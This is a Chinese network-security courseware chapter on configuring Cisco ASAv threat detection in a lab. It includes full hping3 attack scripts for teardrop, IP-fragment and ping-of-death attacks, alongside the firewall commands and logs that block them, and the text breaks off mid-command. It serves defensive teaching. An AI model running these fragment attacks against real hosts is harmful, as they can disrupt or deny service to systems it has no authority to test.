《计算机网络安全防护技术（第二版）》 课件 第2章-任务2.8 配置ASAv的入侵检测功能

第2章

防火墙技术与入侵防御技术任务2.8配置ASAv的入侵检测功能编著：

秦燊劳翠金

计算机网络中的防火墙可以将不安全的网络与需要保护的网络隔离开，并根据安全策略控制进出网络的数据和信息。如果把防火墙看作门卫，入侵检测或入侵防御系统（IDS或IPS）则可看作监视器，它可以时刻监视网络中是否有异常流量并及时阻断，进一步保护网络的安全。

本章以思科ASAv为例，介绍防火墙的基本操作与应用，以及简单IDS功能。本章案例拓扑如图2-0-1所示。图2-0-1防火墙技术实验拓扑图任务2.8配置ASAv的入侵检测功能

CiscoASA将防火墙功能与入侵防御特性集成在一起，提供了全面的数据包监控解决方案。其中，ASA的5500-X型号已将入侵防御系统（IPS）所需的专用硬件内置在设备中，在需要实施IPS时，只需激活IPS模块许可证和安装CIPS软件包即可；ASA5500和ASA5585-X型号则需要将外部IPS硬件模块插入设备的扩展插槽中，才能实施IPS服务。

ASA的入侵防御系统（IPS）模块分为在线IPS模式和杂合IPS模式。在线IPS模式能够丢弃恶意数据包、生成告警或重置连接，所有匹配IPS重定向策略的流量都必须穿越IPS模块后才能离开；杂合IPS模式则只会复制一份数据包给IPS模块进行检测，同时根据安全策略决定是否将数据包转发到内部网络。

ASAv提供了ThreatDetection工具，它的作用就像一个简单的入侵检测系统（IDS），通过检测异常流量模式，防止异常流量进入内部网络，在攻击到达内部网络基础设施之前识别、理解和阻止攻击。下面通过实例介绍ASAv的简单IDS功能。2.8.1观察IP分片和防御泪滴攻击一、在ASAv上配置ACL之前已经在ASAv上配置允许外网访问DMZ区域的WEB站点。为了观察IP分片测试防御泪滴攻击的效果，接着在ASAv上配置ACL允许外网pingDMZ区域的WEB服务器，方法如下：1.ACL配置如下：access-listOutside_DMZextendedpermiticmpanyobjectDMZ_Serveraccess-groupOutside_DMZininterfaceOutside2.为ASAv开启日志记录，命令如下：loggingenableloggingbufferedinformational

二、观看分片效果使用下面的命令观看分片效果：root@kali:~#ping-s2000-c1202.3.3.3//位于DMZ区域，IP地址是172.16.2.1的WEB服务器经NAT转换后IP地址转换为202.3.3.3。在R_DMZ路由器的g0/1接口抓包可以看到分片。这是因为2000大于以太网的MTU值1500，导致系统对载荷进行分片。三、用hping3命令构造分片包hping3的主要参数和用法如下：默认使用TCP模式-1使用ICMP模式-2使用UDP模式-p指定目的主机端口号-i设置发送时间间隔，如-iu10表示发送时间间隔10微秒-S设置SYN标志-a设置源IP地址-c设置发送数据包的个数（count）-N设置IP包的ID-t设置TTL值，默认是64-x设置morefragments标志-g设置Fragmentoffset-C设置ICMP类型-d设置载荷大小（datasize）实验如下:1.R_DMZ路由器的g0/1接口抓包。2.在外网的kaliLinux主机上，执行以下命令：root@kali:~#hping3202.3.3.3-1-x-d1000-N100-c1root@kali:~#hping3202.3.3.3-1-d200-g1008-N100-c1//-g1008表示第二个分片的偏移量是1008，这是因为第一个分片的大小是1000，第一个分片的ICMP包头长度是8，合计为1008。这两条命令之间执行的时间间隔要短才能达到效果。方法是先依次执行这两条命令，此时不会有效果，然后再通过按上下键调用这两条命令，在尽可能短的时间间隔内，依次完成这两条命令的执行。3.查看抓包结果，可观察到reply包。四、进行泪滴攻击并观看防火墙的防范记录ASA防火墙默认启用了基本威胁检测，即threat-detectionbasic-threat,可以阻拦泪滴攻击。具体实验如下：1.在外网的KaliLinux主机上新建泪滴攻击脚本，查看脚本内容如下：root@kali:~#catteardrop.sh#!/bin/bashfor((i=100;i<200;i++))dohping3202.3.3.3-1-x-d1000-N$i-c1hping3202.3.3.3-1-d200-g400-N$i-c1done构造的数据包有两个分片，第二个分片的偏移量应该是1008，但循环语句中却将其设置成了400，故意造成两个分片有重叠。2.执行该脚本，实施泪滴攻击，同时在R_DMZ路由器的g0/1接口上抓包。root@kali:~#chmod+x./teardrop.shroot@kali:~#./teardrop.sh

3.泪滴攻击后，查看抓包的结果，发现抓不到相关的包。4.在防火墙上查看日志，命令如下：ciscoasa(config)#showlogging可以看到：%ASA-2-106020:DenyIPteardropfragment(size=208,offset=400)from202.2.2.30to202.3.3.3说明防火墙已经成功阻挡了泪滴攻击。2.8.2防范IP分片攻击若ASAv不允许外网ping停火区（DMZ），只允许停火区ping外网，则泪滴攻击无法实施，但却可通过echo-reply报文实施IP分片攻击。1.在ASAv上取消外网ping停火区Web服务器的权限，设置允许停火区（DMZ）的服务器ping外网主机的权限。（1）在ASA防火墙上，执行以下命令：ciscoasa(config)#noaccess-listOutside_DMZextendedpermiticmpanyobjectDMZ_Server此时，DMZ区域与外网之间不能ping通。（2）在ASAv上配置允许外网回复DMZ区域服务器的ICMP请求。ciscoasa(config)#access-listOutside_DMZextendedpermiticmpanyobjectDMZ_Serverecho-replyciscoasa(config)#access-groupOutside_DMZininterfaceOutside（3）测试DMZ区域的服务器可以ping通外网，但外网ping不通DMZ区域。2.进行IP分片攻击，观看抓包效果。（1）在外网的KaliLinux主机上新建IP分片攻击脚本，脚本仅以三个分片为例，不影响查看防御效果。查看脚本内容如下：root@kali:~#morepingcs.sh#!/bin/bashhping3202.3.3.3-1-C0-x-d600-N100-c1hping3202.3.3.3-1-C0-x-d200-g608-N100-c1hping3202.3.3.3-1-C0-d100-g816-N100-c1其中，-C0表示ICMP的类型为0，即echo-reply包。（2）执行该脚本实施IP分片攻击，同时在R_DMZ路由器的g0/1接口抓包。root@kali:~#chmod+x./pingcs.shroot@kali:~#./pingcs.sh(3)查看抓包结果，可以抓到echoreply的包。3.在防火墙上禁止IP分片通过，防范IP分片攻击。（1）查看日志输出到缓存区功能已启用，并清除缓存。ciscoasa(config)#showrunloggingloggingenableloggingbufferedinformationalciscoasa(config)#clearloggingbuffer（2）在ASA防火墙上禁止IP分片通过。ciscoasa(config)#fragmentchain1（3）实施IP分片攻击，同时在R_DMZ路由器的g0/1接口抓包。root@kali:~#./pingcs.sh查看抓包结果，发现已经抓不到echoreply包了。（4）在防火墙上，查看日志，命令如下：ciscoasa(config)#showlogging%ASA-4-209005:DiscardIPfragmentsetwithmorethan1elements:

src=200.2.2.30,dest=202.3.3.3,proto=ICMP,id=100可以看到，除了第一个分片，后续分片都被丢弃。2.8.3启用IDS功能防范死亡之ping

1.恢复实验环境，取消之前的禁止IP分片功能。ciscoasa(config)#nofragmentchain1Outsideciscoasa(config)#nofragmentchain1DMZciscoasa(config)#nofragmentchain1Inside2.在防火墙上通过配置ACL，允许外网与DMZ区域间互ping。ciscoasa(config)#noaccess-listOutside_DMZextendedpermiticmpanyobjectDMZ_Serverecho-replyciscoasa(config)#access-listOutside_DMZextendedpermiticmpanyobjectDMZ_Serverciscoasa(config)#access-groupOutside_DMZininterfaceOutside

3.清除日志缓存，配置IDS策略，将其应用到Outside接口上，命令如下：ciscoasa(config)#clearloggingbufferciscoasa(config)#ipauditnameattack_idsattackactionalarmresetciscoasa(config)#ipauditinterfaceOutsideattack_ids4.在外网的KaliLinux主机上新建死亡之ping攻击脚本。（1）查看脚本内容如下：root@kali:~#morepingofdeath.sh#!/bin/bashhping3202.3.3.3-1-x-d1400-N100-c1for((i=1;i<50;i++))do

letj=i*1408

hping3202.3.3.3-1-x-d1400-g$j-N100-c1donehping3202.3.3.3-1-d1000-g70400-N100-c1

（2）设置脚本权限，执行脚本，同时在R_DMZ路由器的g0/1接口抓包。root@kali:~#chmod